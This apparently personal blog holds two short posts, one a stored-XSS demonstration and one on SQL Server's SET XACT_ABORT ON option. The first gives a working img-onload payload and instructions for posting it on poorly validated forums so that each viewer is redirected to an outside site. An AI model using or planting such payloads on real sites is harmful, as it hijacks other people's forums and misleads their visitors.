Richard's footprint on ....
July 31
An XSS sample

Scenario: some forums do not validate input well and allow guests to post messages.

Step: leave the following code snippet
<img src="http://google.com/images/logo.gif" onload="window.location='http://kelekingone.spaces.msn.com'" />
and submit your message.

Result: each time this message is viewed, it will bring you to http://kelekingone.spaces.msn.com.

July 27
SET XACT_ABORT ON

Today, when I viewed the Duwamish source code, I found this SQL Server option. I remembered that in my programs I always checked the @@error variable and then made a decision to ensure the atomicity of the whole transaction. Since this SET XACT_ABORT ON option exists, I think it can be a better choice because of its elegance and simplicity.
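As an added example that is not part of the original post, here are the two styles the post contrasts side by side, run against a constructed dbo.Ledger table whose CHECK constraint makes the second INSERT fail at run time:

```sql
-- Added example, not from the original post: the two styles the post compares.
-- Constructed table; the CHECK constraint makes the second INSERT fail at run time.
CREATE TABLE dbo.Ledger (
    Id      INT IDENTITY PRIMARY KEY,
    Account VARCHAR(20)   NOT NULL,
    Amount  DECIMAL(10,2) NOT NULL CHECK (Amount >= 0)
);
GO

-- Style 1: manual @@ERROR check after every statement.
-- @@ERROR is reset by the next statement, so it must be tested immediately.
SET XACT_ABORT OFF;
BEGIN TRANSACTION;
INSERT INTO dbo.Ledger (Account, Amount) VALUES ('A', 100.00);
IF @@ERROR <> 0 BEGIN ROLLBACK TRANSACTION; RETURN; END;
INSERT INTO dbo.Ledger (Account, Amount) VALUES ('B', -5.00);  -- violates CHECK
IF @@ERROR <> 0 BEGIN ROLLBACK TRANSACTION; RETURN; END;
COMMIT TRANSACTION;
GO
-- Without the second IF, the CHECK violation would abort only that one
-- statement; the transaction would stay open and the COMMIT would still run,
-- leaving account A committed on its own.

-- Style 2: SET XACT_ABORT ON gives the same result with no per-statement checks.
SET XACT_ABORT ON;
BEGIN TRANSACTION;
INSERT INTO dbo.Ledger (Account, Amount) VALUES ('A', 100.00);
INSERT INTO dbo.Ledger (Account, Amount) VALUES ('B', -5.00);  -- run-time error:
-- the whole transaction is rolled back and the batch is terminated here,
-- so the COMMIT below is never reached.
COMMIT TRANSACTION;
GO

SELECT COUNT(*) AS RowCnt FROM dbo.Ledger;  -- 0 after either style
GO
```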